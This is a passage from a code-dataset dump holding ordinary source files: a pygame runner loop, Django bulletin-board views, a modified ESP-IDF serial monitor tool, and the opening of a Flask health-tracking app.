1\n personagem = pulando\n \n\n\n if subir == 1:\n y -= 10\n z += 1\n\n if z == 25:\n subir = 2\n\n if subir == 2:\n y += 10\n z -= 1\n\n if z == 0:\n subir = 0\n personagem = correndo \n \n\n if bx < -800:\n bx = 800\n\n if bx2 < -800:\n bx2 = 800\n\n if xr < - 200:\n xr = 1000\n yr = random.randint(0, 300)\n\n if xr2 < - 200:\n xr2 = 1000\n yr2 = random.randint(0, 300)\n\n if xr3 < - 200:\n xr3 = 1000\n yr3 = random.randint(0, 300)\n\n if yi1 < 0:\n a = a * (-1)\n\n if yi1 > 300:\n a = a * (-1)\n\n if xb1 < -150:\n xb1 = 700\n yb1 = yi1 + 10 \n\n if xb2 < -150:\n xb2 = 700\n yb2 = yi2 + 10\n \n\n\n line_rect = Rect(xr,yr, 200, 50)\n line_rect2 = Rect(xr2,yr2, 200, 50)\n line_rect3 = Rect(xr3,yr3, 200, 50) \n xr -= 5\n xr2 -= 5\n xr3 -= 5\n bx -= 5\n bx2 -= 5\n yi1 += a\n yi2 = y - 30\n xb1 -= 4\n xb2 -= 4\n clock.tick(60)\n screen.blit(background, (bx,0))\n screen.blit(background2, (bx2,0))\n screen.blit(personagem, (x,y))\n screen.blit(bala1, (xb1,yb1))\n screen.blit(bala2, (xb2,yb2))\n screen.blit(inimigo1, (xi1,yi1))\n screen.blit(inimigo2, (xi2,yi2))\n\n\n\n pygame.draw.rect(screen, branco, line_rect)\n pygame.draw.rect(screen, branco, line_rect2)\n pygame.draw.rect(screen, branco, line_rect3)\n pygame.display.update()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"456220600","text":"from django.core.paginator import Paginator, EmptyPage, InvalidPage, PageNotAnInteger\nfrom django.db.models import F\nfrom django.db.models.functions import math\nfrom django.http import HttpResponse , HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect, render_to_response\nfrom django.template import loader, RequestContext\nfrom django.utils import timezone\nfrom django.views import generic\nfrom .models import Post\n\n\ndef post_list(request): # 리스트\n queryset_list = Post.objects.all()\n paginator = Paginator(queryset_list, 5)\n\n page = request.GET.get('page')\n try:\n queryset = paginator.page(page)\n except PageNotAnInteger:\n queryset = paginator.page(1)\n except EmptyPage:\n queryset = paginator.page(paginator.num_pages)\n\n context = {\n \"object_list\": queryset, \"title\": queryset_list\n }\n\n return render(request, \"bbs/index.html\", context)\n\ndef post_detail(request, pk): # 상세보기\n wathing = get_object_or_404(Post, id=pk)\n writing = Post.objects.filter(id=pk)\n writing.update(post_hits=F('post_hits')+1) # 조회수 증가\n return render(request, 'bbs/detail.html', {'writing': writing[0], 'wathing':wathing,})\n\n\nclass WriteView(generic.DetailView): #수정화면\n def update_write(request, post_id):\n writing = get_object_or_404(Post, pk=post_id)\n return render(request, 'bbs/update.html', {'writing': writing})\n\n model = Post\n template_name = 'bbs/update.html'\n context_object_name = 'write'\n\ndef writing(request): # 게시글 추가\n post = Post()\n post.writer = request.POST['writer']\n post.post_title = request.POST['title']\n post.post_contents = request.POST['body']\n post.post_date = timezone.datetime.now()\n post.save()\n\n return redirect('/bbs/' + str(post.id))\n\ndef new(request): # 게시글 추가화면\n return render(request, 'bbs/new.html')\n\ndef create(request): # 게시글 추가\n post = Post()\n post.writer = request.GET['writer']\n post.post_title = request.GET['title']\n post.post_contents = request.GET['body']\n post.post_date = timezone.datetime.now()\n post.post_hits = 0\n post.save()\n return redirect('/bbs/' + 
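The jump in `Main.py` is a three-state machine (`subir` 0/1/2) driven by the tick counter `z`: 25 ticks of rising at 10 px, then a mirrored descent. A dependency-free simulation of just that state machine, confirming the sprite lands exactly where it took off:

```python
# subir: 0 = grounded, 1 = rising, 2 = falling; z counts ticks in each phase.
def step(y, subir, z):
    if subir == 1:            # rising phase: 10 px per tick for 25 ticks
        y -= 10
        z += 1
        if z == 25:
            subir = 2
    elif subir == 2:          # falling phase mirrors the ascent
        y += 10
        z -= 1
        if z == 0:
            subir = 0
    return y, subir, z

y, subir, z = 325, 1, 0       # SPACE pressed: jump starts
for _ in range(50):
    y, subir, z = step(y, subir, z)
assert (y, subir, z) == (325, 0, 0)
print("landed at y =", y)
```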
str(post.id))\n\ndef delete(request, post_id): #삭제 # 게시글 삭제\n post = Post.objects.get(id=post_id)\n post.delete()\n return redirect('/bbs/')\n\ndef modify(request, post_id): # 게시글 수정\n if request.method ==\"POST\":\n try:\n post = get_object_or_404(Post, id=post_id)\n post.writer = request.POST.get(\"name\")\n post.post_title = request.POST.get(\"title\")\n post.post_contents = request.POST.get(\"body\")\n post.post_date = timezone.datetime.now()\n print(\"post_writer\")\n post.save()\n except Exception as e:\n print(\"modify err\", e)\n\n return HttpResponseRedirect(\"/bbs/\")\n\n\n\n","sub_path":"board/bbs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228071190","text":"from __future__ import division, print_function, unicode_literals\n\nimport argparse\nimport codecs\nimport datetime\nimport os\nimport re\nimport subprocess\nimport time\nfrom builtins import bytes, chr, object\n\ntry:\n import queue\nexcept ImportError:\n import Queue as queue\n\nimport ctypes\nimport json\nimport shlex\nimport sys\nimport tempfile\nimport textwrap\nimport threading\nimport time\nimport types\nfrom distutils.version import StrictVersion\nfrom io import open\n\nimport serial\nimport serial.tools.list_ports\nimport serial.tools.miniterm as miniterm\n\nkey_description = miniterm.key_description\n\n# Control-key characters\nCTRL_A = '\\x01'\nCTRL_B = '\\x02'\nCTRL_F = '\\x06'\nCTRL_H = '\\x08'\nCTRL_R = '\\x12'\nCTRL_T = '\\x14'\nCTRL_Y = '\\x19'\nCTRL_P = '\\x10'\nCTRL_X = '\\x18'\nCTRL_L = '\\x0c'\nCTRL_RBRACKET = '\\x1d' # Ctrl+]\n\n# Command parsed from console inputs\nCMD_STOP = 1\nCMD_RESET = 2\nCMD_MAKE = 3\nCMD_APP_FLASH = 4\nCMD_OUTPUT_TOGGLE = 5\nCMD_TOGGLE_LOGGING = 6\nCMD_ENTER_BOOT = 7\n\n# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)\nANSI_RED = '\\033[1;31m'\nANSI_YELLOW = '\\033[0;33m'\nANSI_NORMAL = '\\033[0m'\n\n\ndef color_print(message, color, newline='\\n'):\n \"\"\" Print a message to stderr with colored highlighting \"\"\"\n sys.stderr.write('%s%s%s%s' % (color, message, ANSI_NORMAL, newline))\n\n\ndef yellow_print(message, newline='\\n'):\n color_print(message, ANSI_YELLOW, newline)\n\n\ndef red_print(message, newline='\\n'):\n color_print(message, ANSI_RED, newline)\n\n\n__version__ = '1.1'\n\n# Tags for tuples in queues\nTAG_KEY = 0\nTAG_SERIAL = 1\nTAG_SERIAL_FLUSH = 2\nTAG_CMD = 3\n\n# regex matches an potential PC value (0x4xxxxxxx)\nMATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)\n\nDEFAULT_TOOLCHAIN_PREFIX = 'xtensa-esp32-elf-'\n\nDEFAULT_PRINT_FILTER = ''\n\nclass StoppableThread(object):\n \"\"\"\n Provide a Thread-like class which can be 'cancelled' via a subclass-provided\n cancellation method.\n\n Can be started and stopped multiple times.\n\n Isn't an instance of type Thread because Python Thread objects can only be run once\n \"\"\"\n def __init__(self):\n self._thread = None\n\n @property\n def alive(self):\n \"\"\"\n Is 'alive' whenever the internal thread object exists\n \"\"\"\n return self._thread is not None\n\n def start(self):\n if self._thread is None:\n self._thread = threading.Thread(target=self._run_outer)\n self._thread.start()\n\n def _cancel(self):\n pass # override to provide cancellation functionality\n\n def run(self):\n pass # override for the main thread behaviour\n\n def _run_outer(self):\n try:\n self.run()\n finally:\n self._thread = None\n\n def stop(self):\n if 
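`post_detail` above bumps the hit counter with `F('post_hits') + 1` so the increment runs inside the database instead of as a read-modify-write in Python. The same effect shown with plain `sqlite3`, standing in for the Django ORM (which needs a configured project to run):

```python
# Why update(post_hits=F('post_hits') + 1) matters: the increment is a single
# in-database statement, so concurrent requests cannot overwrite each other.
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE post (id INTEGER PRIMARY KEY, hits INTEGER)")
con.execute("INSERT INTO post VALUES (1, 0)")

for _ in range(5):   # five page views
    con.execute("UPDATE post SET hits = hits + 1 WHERE id = 1")

print(con.execute("SELECT hits FROM post WHERE id = 1").fetchone()[0])  # 5
```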
self._thread is not None:\n old_thread = self._thread\n self._thread = None\n self._cancel()\n old_thread.join()\n\nclass Killer(threading.Thread):\n def __init__(self, q):\n threading.Thread.__init__(self)\n self.q = q\n\n def run(self):\n time.sleep(5)\n # Seppuku!\n self.q.put((TAG_CMD, CMD_STOP))\n\nclass ConsoleReader(StoppableThread):\n \"\"\" Read input keys from the console and push them to the queue,\n until stopped.\n \"\"\"\n def __init__(self, console, event_queue, cmd_queue, parser):\n super(ConsoleReader, self).__init__()\n self.console = console\n self.event_queue = event_queue\n self.cmd_queue = cmd_queue\n self.parser = parser\n\n def run(self):\n self.console.setup()\n try:\n while self.alive:\n try:\n c = self.console.getkey()\n except KeyboardInterrupt:\n c = '\\x03'\n if c is not None:\n ret = self.parser.parse(c)\n if ret is not None:\n (tag, cmd) = ret\n # stop command should be executed last\n if tag == TAG_CMD and cmd != CMD_STOP:\n self.cmd_queue.put(ret)\n else:\n self.event_queue.put(ret)\n\n finally:\n self.console.cleanup()\n\n def _cancel(self):\n import fcntl\n import termios\n fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\\0')\n\n\nclass ConsoleParser(object):\n\n def __init__(self, eol='CRLF'):\n self.translate_eol = {\n 'CRLF': lambda c: c.replace('\\n', '\\r\\n'),\n 'CR': lambda c: c.replace('\\n', '\\r'),\n 'LF': lambda c: c.replace('\\r', '\\n'),\n }[eol]\n self.menu_key = CTRL_T\n self.exit_key = CTRL_RBRACKET\n self._pressed_menu_key = False\n\n def parse(self, key):\n ret = None\n if self._pressed_menu_key:\n ret = self._handle_menu_key(key)\n elif key == self.menu_key:\n self._pressed_menu_key = True\n elif key == self.exit_key:\n ret = (TAG_CMD, CMD_STOP)\n else:\n key = self.translate_eol(key)\n ret = (TAG_KEY, key)\n return ret\n\n def _handle_menu_key(self, c):\n ret = None\n if c == self.exit_key or c == self.menu_key: # send verbatim\n ret = (TAG_KEY, c)\n elif c in [CTRL_H, 'h', 'H', '?']:\n red_print(self.get_help_text())\n elif c == CTRL_R: # Reset device via RTS\n ret = (TAG_CMD, CMD_RESET)\n elif c == CTRL_F: # Recompile & upload\n ret = (TAG_CMD, CMD_MAKE)\n elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only\n # \"CTRL-A\" cannot be captured with the default settings of the Windows command line, therefore, \"A\" can be used\n # instead\n ret = (TAG_CMD, CMD_APP_FLASH)\n elif c == CTRL_Y: # Toggle output display\n ret = (TAG_CMD, CMD_OUTPUT_TOGGLE)\n elif c == CTRL_L: # Toggle saving output into file\n ret = (TAG_CMD, CMD_TOGGLE_LOGGING)\n elif c == CTRL_P:\n yellow_print('Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart')\n # to fast trigger pause without press menu key\n ret = (TAG_CMD, CMD_ENTER_BOOT)\n elif c in [CTRL_X, 'x', 'X']: # Exiting from within the menu\n ret = (TAG_CMD, CMD_STOP)\n else:\n red_print('--- unknown menu character {} --'.format(key_description(c)))\n\n self._pressed_menu_key = False\n return ret\n\n def get_help_text(self):\n text = \"\"\"\\\n --- idf_monitor ({version}) - ESP-IDF monitor tool\n --- based on miniterm from pySerial\n ---\n --- {exit:8} Exit program\n --- {menu:8} Menu escape key, followed by:\n --- Menu keys:\n --- {menu:14} Send the menu character itself to remote\n --- {exit:14} Send the exit character itself to remote\n --- {reset:14} Reset target board via RTS line\n --- {makecmd:14} Build & flash project\n --- {appmake:14} Build & flash app only\n --- {output:14} Toggle output display\n --- {log:14} Toggle saving output into file\n --- {pause:14} Reset target 
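`StoppableThread` wraps a fresh `threading.Thread` per `start()` because a `Thread` object can only be run once. A compact, runnable variant of the pattern using an `Event` for cancellation (the original instead overrides `_cancel`, e.g. to unblock a console read):

```python
import threading
import time

class StoppableWorker:
    """Restartable worker: a new Thread per start(), an Event to cancel."""
    def __init__(self):
        self._thread = None
        self._stop = threading.Event()

    def start(self):
        if self._thread is None:
            self._stop.clear()
            self._thread = threading.Thread(target=self._run)
            self._thread.start()

    def _run(self):
        while not self._stop.is_set():
            time.sleep(0.05)          # stand-in for real work

    def stop(self):
        if self._thread is not None:
            self._stop.set()
            self._thread.join()
            self._thread = None

w = StoppableWorker()
for _ in range(2):                    # start/stop twice to show reuse
    w.start(); time.sleep(0.1); w.stop()
print("worker stopped cleanly twice")
```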
into bootloader to pause app via RTS line\n --- {menuexit:14} Exit program\n \"\"\".format(version=__version__,\n exit=key_description(self.exit_key),\n menu=key_description(self.menu_key),\n reset=key_description(CTRL_R),\n makecmd=key_description(CTRL_F),\n appmake=key_description(CTRL_A) + ' (or A)',\n output=key_description(CTRL_Y),\n log=key_description(CTRL_L),\n pause=key_description(CTRL_P),\n menuexit=key_description(CTRL_X) + ' (or X)')\n return textwrap.dedent(text)\n\n def get_next_action_text(self):\n text = \"\"\"\\\n --- Press {} to exit monitor.\n --- Press {} to build & flash project.\n --- Press {} to build & flash app.\n --- Press any other key to resume monitor (resets target).\n \"\"\".format(key_description(self.exit_key),\n key_description(CTRL_F),\n key_description(CTRL_A))\n return textwrap.dedent(text)\n\n def parse_next_action_key(self, c):\n ret = None\n if c == self.exit_key:\n ret = (TAG_CMD, CMD_STOP)\n elif c == CTRL_F: # Recompile & upload\n ret = (TAG_CMD, CMD_MAKE)\n elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only\n # \"CTRL-A\" cannot be captured with the default settings of the Windows command line, therefore, \"A\" can be used\n # instead\n ret = (TAG_CMD, CMD_APP_FLASH)\n return ret\n\n\nclass SerialReader(StoppableThread):\n \"\"\" Read serial data from the serial port and push to the\n event queue, until stopped.\n \"\"\"\n def __init__(self, serial, event_queue):\n super(SerialReader, self).__init__()\n self.baud = serial.baudrate\n self.serial = serial\n self.event_queue = event_queue\n if not hasattr(self.serial, 'cancel_read'):\n # enable timeout for checking alive flag,\n # if cancel_read not available\n self.serial.timeout = 0.25\n\n def run(self):\n if not self.serial.is_open:\n self.serial.baudrate = self.baud\n self.serial.rts = True # Force an RTS reset on open\n self.serial.open()\n time.sleep(0.005) # Add a delay to meet the requirements of minimal EN low time (2ms for ESP32-C3)\n self.serial.rts = False\n self.serial.dtr = self.serial.dtr # usbser.sys workaround\n try:\n while self.alive:\n try:\n data = self.serial.read(self.serial.in_waiting or 1)\n except (serial.serialutil.SerialException, IOError) as e:\n data = b''\n # self.serial.open() was successful before, therefore, this is an issue related to\n # the disappearance of the device\n red_print(e)\n yellow_print('Waiting for the device to reconnect', newline='')\n self.serial.close()\n while self.alive: # so that exiting monitor works while waiting\n try:\n time.sleep(0.5)\n self.serial.open()\n break # device connected\n except serial.serialutil.SerialException:\n yellow_print('.', newline='')\n sys.stderr.flush()\n yellow_print('') # go to new line\n if len(data):\n self.event_queue.put((TAG_SERIAL, data), False)\n finally:\n self.serial.close()\n\n def _cancel(self):\n if hasattr(self.serial, 'cancel_read'):\n try:\n self.serial.cancel_read()\n except Exception:\n pass\n\n\nclass LineMatcher(object):\n \"\"\"\n Assembles a dictionary of filtering rules based on the --print_filter\n argument of idf_monitor. 
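`ConsoleParser` is a two-keystroke state machine: `Ctrl-T` arms the menu and the next key selects a command. A toy re-implementation of that prefix-key logic (command names are illustrative, and only a few of the monitor's bindings are reproduced):

```python
CTRL_T, CTRL_R, CTRL_RBRACKET = '\x14', '\x12', '\x1d'

class MenuParser:
    def __init__(self):
        self._armed = False           # True after the menu key was pressed

    def parse(self, key):
        if self._armed:
            self._armed = False
            if key in (CTRL_T, CTRL_RBRACKET):
                return ('KEY', key)   # send the control char itself
            if key == CTRL_R:
                return ('CMD', 'RESET')
            return ('CMD', 'UNKNOWN')
        if key == CTRL_T:
            self._armed = True        # wait for the second keystroke
            return None
        if key == CTRL_RBRACKET:
            return ('CMD', 'STOP')
        return ('KEY', key)

p = MenuParser()
assert p.parse(CTRL_T) is None
assert p.parse(CTRL_R) == ('CMD', 'RESET')
assert p.parse('a') == ('KEY', 'a')
print("menu parser ok")
```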
Then later it is used to match lines and\n determine whether they should be shown on screen or not.\n \"\"\"\n LEVEL_N = 0\n LEVEL_E = 1\n LEVEL_W = 2\n LEVEL_I = 3\n LEVEL_D = 4\n LEVEL_V = 5\n\n level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,\n 'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}\n\n def __init__(self, print_filter):\n self._dict = dict()\n self._re = re.compile(r'^(?:\\033\\[[01];?[0-9]+m?)?([EWIDV]) \\([0-9]+\\) ([^:]+): ')\n items = print_filter.split()\n if len(items) == 0:\n self._dict['*'] = self.LEVEL_V # default is to print everything\n for f in items:\n s = f.split(r':')\n if len(s) == 1:\n # specifying no warning level defaults to verbose level\n lev = self.LEVEL_V\n elif len(s) == 2:\n if len(s[0]) == 0:\n raise ValueError('No tag specified in filter ' + f)\n try:\n lev = self.level[s[1].upper()]\n except KeyError:\n raise ValueError('Unknown warning level in filter ' + f)\n else:\n raise ValueError('Missing \":\" in filter ' + f)\n self._dict[s[0]] = lev\n\n def match(self, line):\n try:\n m = self._re.search(line)\n if m:\n lev = self.level[m.group(1)]\n if m.group(2) in self._dict:\n return self._dict[m.group(2)] >= lev\n return self._dict.get('*', self.LEVEL_N) >= lev\n except (KeyError, IndexError):\n # Regular line written with something else than ESP_LOG*\n # or an empty line.\n pass\n # We need something more than \"*.N\" for printing.\n return self._dict.get('*', self.LEVEL_N) > self.LEVEL_N\n\n\nclass SerialStopException(Exception):\n \"\"\"\n This exception is used for stopping the IDF monitor in testing mode.\n \"\"\"\n pass\n\n\nclass Monitor(object):\n \"\"\"\n Monitor application main class.\n\n This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this\n purpose.\n\n Main difference is that all event processing happens in the main thread, not the worker threads.\n \"\"\"\n def __init__(self, serial_instance):\n super(Monitor, self).__init__()\n self.event_queue = queue.Queue()\n self.cmd_queue = queue.Queue()\n self.console = miniterm.Console()\n self.enable_address_decoding = False\n\n if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):\n # Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)\n def getkey_patched(self):\n c = self.enc_stdin.read(1)\n if c == chr(0x7f):\n c = chr(8) # map the BS key (which yields DEL) to backspace\n return c\n\n self.console.getkey = types.MethodType(getkey_patched, self.console)\n\n self.serial = serial_instance\n self.console_parser = ConsoleParser('CRLF')\n self.console_reader = ConsoleReader(self.console, self.event_queue, self.cmd_queue, self.console_parser)\n self.serial_reader = SerialReader(self.serial, self.event_queue)\n self.killer = Killer(self.event_queue)\n self.elf_file = None\n self.make = ''\n self.encrypted = ''\n self.toolchain_prefix = ''\n self.websocket_client = None\n #self.target = target\n\n # internal state\n self._last_line_part = b''\n self._line_matcher = LineMatcher('')\n self._invoke_processing_last_line_timer = None\n self._force_line_print = False\n self._output_enabled = True\n self._log_file = None\n\n def invoke_processing_last_line(self):\n self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)\n\n def main_loop(self):\n self.console_reader.start()\n self.serial_reader.start()\n self.killer.start()\n started = time.time()\n try:\n while self.console_reader.alive and self.serial_reader.alive:\n try:\n item = self.cmd_queue.get_nowait()\n if 
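`LineMatcher` turns a `tag:level` filter string into a dict and lets a log line through when its tag's threshold is at or above the line's level. A trimmed-down version of the same rule engine (the regex here omits the ANSI-color prefix the original also accepts):

```python
# Compact sketch of the LineMatcher filter above.
import re

LEVELS = {'N': 0, 'E': 1, 'W': 2, 'I': 3, 'D': 4, 'V': 5}
LINE_RE = re.compile(r'^([EWIDV]) \([0-9]+\) ([^:]+): ')

def build_filter(spec: str) -> dict:
    rules = {}
    for item in spec.split() or ['*']:   # empty spec means "print everything"
        tag, _, lev = item.partition(':')
        rules[tag] = LEVELS[lev.upper()] if lev else LEVELS['V']
    return rules

def match(rules: dict, line: str) -> bool:
    m = LINE_RE.search(line)
    if not m:                            # not an ESP_LOG* line
        return rules.get('*', 0) > 0
    lev = LEVELS[m.group(1)]
    return rules.get(m.group(2), rules.get('*', 0)) >= lev

rules = build_filter('wifi:W *:E')
assert match(rules, 'W (123) wifi: beacon timeout')
assert not match(rules, 'I (124) wifi: connected')
assert match(rules, 'E (125) boot: panic')
print("filter ok")
```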
time.time() - started > 10:\n print(\"Hammerzeit!\")\n self.console_reader.stop()\n self.serial_reader.stop()\n except queue.Empty:\n try:\n item = self.event_queue.get(True, 0.03)\n except queue.Empty:\n continue\n (event_tag, data) = item\n if event_tag == TAG_CMD:\n self.handle_commands(data)\n elif event_tag == TAG_KEY:\n try:\n self.serial.write(codecs.encode(data))\n except serial.SerialException:\n pass # this shouldn't happen, but sometimes port has closed in serial thread\n except UnicodeEncodeError:\n pass # this can happen if a non-ascii character was passed, ignoring\n elif event_tag == TAG_SERIAL:\n self.handle_serial_input(data)\n if self._invoke_processing_last_line_timer is not None:\n self._invoke_processing_last_line_timer.cancel()\n self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)\n self._invoke_processing_last_line_timer.start()\n # If no further data is received in the next short period\n # of time then the _invoke_processing_last_line_timer\n # generates an event which will result in the finishing of\n # the last line. This is fix for handling lines sent\n # without EOL.\n elif event_tag == TAG_SERIAL_FLUSH:\n self.handle_serial_input(data, finalize_line=True)\n else:\n raise RuntimeError('Bad event data %r' % ((event_tag,data),))\n except SerialStopException:\n sys.stderr.write(ANSI_NORMAL + 'Stopping condition has been received\\n')\n finally:\n try:\n self.console_reader.stop()\n self.serial_reader.stop()\n self.stop_logging()\n # Cancelling _invoke_processing_last_line_timer is not\n # important here because receiving empty data doesn't matter.\n self._invoke_processing_last_line_timer = None\n except Exception:\n pass\n sys.stderr.write(ANSI_NORMAL + '\\n')\n\n def handle_serial_input(self, data, finalize_line=False):\n sp = data.split(b'\\n')\n if self._last_line_part != b'':\n # add unprocessed part from previous \"data\" to the first line\n sp[0] = self._last_line_part + sp[0]\n self._last_line_part = b''\n if sp[-1] != b'':\n # last part is not a full line\n self._last_line_part = sp.pop()\n for line in sp:\n if line != b'':\n if line == self.console_parser.exit_key.encode('latin-1'):\n raise SerialStopException()\n if self._force_line_print or self._line_matcher.match(line.decode(errors='ignore')):\n self._print(line + b'\\n')\n self._force_line_print = False\n # Now we have the last part (incomplete line) in _last_line_part. By\n # default we don't touch it and just wait for the arrival of the rest\n # of the line. 
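`main_loop` services two queues with different priorities: commands are drained with a non-blocking `get_nowait()`, and serial/key events are only waited on, with a short timeout, when no command is pending. The discipline in miniature:

```python
# Sketch of the main_loop queue discipline above.
import queue

cmd_q, event_q = queue.Queue(), queue.Queue()
event_q.put(('SERIAL', b'hello'))
cmd_q.put(('CMD', 'RESET'))
event_q.put(('SERIAL', b'world'))

handled = []
for _ in range(3):
    try:
        item = cmd_q.get_nowait()          # commands always win
    except queue.Empty:
        item = event_q.get(True, 0.03)     # then block briefly on events
    handled.append(item)

print(handled)   # the RESET command is handled before both serial events
```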
But after some time when we didn't received it we need\n # to make a decision.\n if self._last_line_part != b'':\n if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors='ignore'))):\n self._force_line_print = True\n self._print(self._last_line_part)\n self._last_line_part = b''\n # else: keeping _last_line_part and it will be processed the next time\n # handle_serial_input is invoked\n\n def __enter__(self):\n \"\"\" Use 'with self' to temporarily disable monitoring behaviour \"\"\"\n self.serial_reader.stop()\n self.console_reader.stop()\n\n def __exit__(self, *args, **kwargs):\n \"\"\" Use 'with self' to temporarily disable monitoring behaviour \"\"\"\n self.console_reader.start()\n self.serial_reader.start()\n\n def prompt_next_action(self, reason):\n self.console.setup() # set up console to trap input characters\n try:\n red_print('--- {}'.format(reason))\n red_print(self.console_parser.get_next_action_text())\n\n k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.\n while k == CTRL_T:\n k = self.console.getkey()\n finally:\n self.console.cleanup()\n ret = self.console_parser.parse_next_action_key(k)\n if ret is not None:\n cmd = ret[1]\n if cmd == CMD_STOP:\n # the stop command should be handled last\n self.event_queue.put(ret)\n else:\n self.cmd_queue.put(ret)\n\n def output_enable(self, enable):\n self._output_enabled = enable\n\n def output_toggle(self):\n self._output_enabled = not self._output_enabled\n yellow_print('\\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.'.format(self._output_enabled))\n\n def toggle_logging(self):\n if self._log_file:\n self.stop_logging()\n else:\n self.start_logging()\n\n def start_logging(self):\n if not self._log_file:\n try:\n name = 'log.{}.{}.txt'.format(os.path.splitext(os.path.basename(self.elf_file))[0],\n datetime.datetime.now().strftime('%Y%m%d%H%M%S'))\n self._log_file = open(name, 'wb+')\n yellow_print('\\nLogging is enabled into file {}'.format(name))\n except Exception as e:\n red_print('\\nLog file {} cannot be created: {}'.format(name, e))\n\n def stop_logging(self):\n if self._log_file:\n try:\n name = self._log_file.name\n self._log_file.close()\n yellow_print('\\nLogging is disabled and file {} has been closed'.format(name))\n except Exception as e:\n red_print('\\nLog file cannot be closed: {}'.format(e))\n finally:\n self._log_file = None\n\n def _print(self, string, console_printer=None):\n if console_printer is None:\n console_printer = self.console.write_bytes\n if self._output_enabled:\n console_printer(string)\n if self._log_file:\n try:\n if isinstance(string, type(u'')):\n string = string.encode()\n self._log_file.write(string)\n except Exception as e:\n red_print('\\nCannot write to file: {}'.format(e))\n # don't fill-up the screen with the previous errors (probably consequent prints would fail also)\n self.stop_logging()\n\n def handle_commands(self, cmd):\n if cmd == CMD_STOP:\n self.console_reader.stop()\n self.serial_reader.stop()\n elif cmd == CMD_RESET:\n self.serial.setRTS(True)\n self.serial.setDTR(self.serial.dtr) # usbser.sys workaround\n time.sleep(0.2)\n self.serial.setRTS(False)\n self.serial.setDTR(self.serial.dtr) # usbser.sys workaround\n self.output_enable(True)\n elif cmd == CMD_OUTPUT_TOGGLE:\n self.output_toggle()\n elif cmd == CMD_ENTER_BOOT:\n self.serial.setDTR(False) # IO0=HIGH\n self.serial.setRTS(True) # EN=LOW, chip in reset\n self.serial.setDTR(self.serial.dtr) # usbser.sys 
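`handle_serial_input` never assumes a read ends on a newline: it splits on `b'\n'`, carries the trailing fragment in `_last_line_part`, and flushes it only when the idle timer fires a `TAG_SERIAL_FLUSH`. The same buffering as a small standalone class:

```python
class LineAssembler:
    """Split incoming bytes on newlines, keeping the trailing partial line."""
    def __init__(self):
        self._tail = b''
        self.lines = []

    def feed(self, data: bytes, finalize: bool = False):
        parts = (self._tail + data).split(b'\n')
        self._tail = parts.pop()           # b'' if data ended on a newline
        self.lines.extend(p for p in parts if p)
        if finalize and self._tail:
            self.lines.append(self._tail)  # emit the incomplete line anyway
            self._tail = b''

asm = LineAssembler()
asm.feed(b'boot ok\npartial')
asm.feed(b' line\n')
asm.feed(b'no newline yet')
asm.feed(b'', finalize=True)               # the idle-timer flush
print(asm.lines)   # [b'boot ok', b'partial line', b'no newline yet']
```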
workaround\n time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1\n self.serial.setDTR(True) # IO0=LOW\n self.serial.setRTS(False) # EN=HIGH, chip out of reset\n self.serial.setDTR(self.serial.dtr) # usbser.sys workaround\n time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05\n self.serial.setDTR(False) # IO0=HIGH, done\n else:\n raise RuntimeError('Bad command data %d' % (cmd))\n\n\ndef main():\n parser = argparse.ArgumentParser('idf_monitor - a serial output monitor for esp-idf')\n\n parser.add_argument(\n '--port', '-p',\n help='Serial port device',\n default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')\n )\n\n parser.add_argument(\n '--baud', '-b',\n help='Serial port baud rate',\n type=int,\n default=os.getenv('IDF_MONITOR_BAUD', os.getenv('MONITORBAUD', 115200)))\n\n args = parser.parse_args()\n\n serial_instance = serial.Serial()\n serial_instance.port = args.port\n serial_instance.baudrate = args.baud\n serial_instance.dtr = False\n serial_instance.rts = False\n\n monitor = Monitor(serial_instance)\n\n monitor.main_loop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"ui/idf_monitor.py","file_name":"idf_monitor.py","file_ext":"py","file_size_in_byte":24727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"205166604","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, request, make_response, send_file\nfrom flask_table import Table, Col, LinkCol\nimport datetime, os, pathlib\nfrom datetime import datetime as dt\nfrom dateutil.relativedelta import relativedelta\nfrom logging import DEBUG\nfrom util.dateUtil import conv_str_datetime\nfrom util.dateUtil import get_one_month_before\nfrom util.dateUtil import conv_str_to_date\nfrom util.dateUtil import conv_str_to_datetime\nfrom util.loggingUtil import get_handler\nimport jaconv\nfrom lib import com\nfrom lib import com_db\nfrom lib import com_health\n\napp = Flask(__name__)\ndb_util = None\nhealth = None\nheight = 0.0\ntarget_weight = 0\n\ndt_today = datetime.datetime.today()\ncurrent_dir = pathlib.Path(__file__).resolve().parent\n\n# 設定ファイル読み込み\nsettings = com.get_settings(current_dir)\nheight = float(settings[\"height\"])\ntarget_weight = float(settings[\"target_weight\"])\n\n# グラフ用画像ファイル名設定\npng_file_name = 